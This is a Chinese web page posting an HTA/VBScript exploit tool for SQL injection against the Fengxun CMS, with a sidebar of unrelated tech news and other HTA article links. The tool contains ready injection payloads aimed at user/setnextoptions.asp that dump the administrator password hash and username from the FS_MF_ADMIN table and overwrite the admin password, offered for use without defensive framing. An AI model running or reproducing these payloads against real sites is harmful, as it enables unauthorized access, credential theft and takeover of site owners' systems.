风讯注入exp实例代码,hta版的方便使用
<SCRIPT LANGUAGE="VBScript">
Sub Window_onLoad
window.resizeTo 450,380
window.moveTo 300, 300
End Sub 
</SCRIPT>

<SCRIPT LANGUAGE="VBScript">
Function getHTTPPage(Path)
 t = GetBody(Path)
 getHTTPPage = BytesToBstr(t, "GB2312")
document.getElementById("url").innerText=getHTTPPage
End Function
</script>
<SCRIPT LANGUAGE="VBScript">
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
 GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
 objstream.Type = 1
 objstream.Mode = 3
 objstream.Open
 objstream.Write Body
 objstream.Position = 0
 objstream.Type = 2
 objstream.Charset = Cset
 BytesToBstr = objstream.ReadText
 objstream.Close
Set objstream = Nothing
End Function

</script>

<title>by lcx</title>
<input id="urlcode" NAME="urlcode" size="60" value="http://风讯url/user/setnextoptions.asp">
<select id="sql" name="sql" onchange=vbs:getHTTPPage(document.getElementById("urlcode").value+document.getElementById("sql").value)>
<option value="">风讯sql版注入,至于其它备份shell的语句懒得写了</option>
<option value="?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员密码</option>
<option value="?EquValue=1&ReqSql=select%201,Admin_Name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理员用户名</option>
<option value="?EquValue=1&ReqSql=select user;update FS_MF_ADMIN set ADMIN_pass_word='a0b923820dcc509a' where id=1--">更改管理员密码为1</option>
</select>
<TEXTAREA id="url" NAME="url" ROWS="8" COLS="60"></TEXTAREA>
最新资讯
瑞幸把你们都骗了

瑞幸把你们都骗了

在过去的一年当中,关于“新物种”瑞幸咖啡的热议一轮接
易到用车服务器遭到连续攻击 攻击者索要巨额比特币

易到用车服务器遭到连

26日凌晨,易到用车服务器遭到连续攻击,给用户使用带来严
周鸿祎谈中芯国际退市 人们现在才明白360是先见之明

周鸿祎谈中芯国际退市

360董事长兼CEO周鸿祎谈到“中芯国际退市”时表示,科技
发力新能源:从新能源汽车产业发展看中国经济新动能

发力新能源:从新能源汽

去年以来,新能源汽车的优秀表现成为中国车市的一抹亮色
喜马拉雅FM 12名董事退出 回应:因公司搭VIE结构

喜马拉雅FM 12名董事

喜马拉雅FM回应称:此次变动是因为公司搭VIE结构,所有境
联合国秘书长致2019中国国际大数据产业博览会贺信

联合国秘书长致2019中

联合国秘书长安东尼奥·古特雷斯致2019中国国际大数据
最新文章
HTA编辑HOST文件的脚本

HTA编辑HOST文件的脚

一个修改HOST文件的小工具,利用FSO实现,代码比较长,功能
学习正则帮手笨狼正则练习器

学习正则帮手笨狼正则

把下面的文件保存为hta文件,运行即可
hta实现的笨狼XSLT练习器

hta实现的笨狼XSLT练

学习XSLT的朋友,用这个小工具不错
hta实现的定时关机小程序

hta实现的定时关机小

这个小程序使用hta写的,用了vbscript代码实现,喜欢的朋
用来通知论坛有新贴子的hta代码

用来通知论坛有新贴子

做了个用来通知论坛有新贴子的hta把下面的代码copy到
用vbs如何确定在 HTA 中选择了哪些文本?

用vbs如何确定在 HTA

问:您好,脚本专家!如何确定在HTA中选择了哪些文本?--DO答: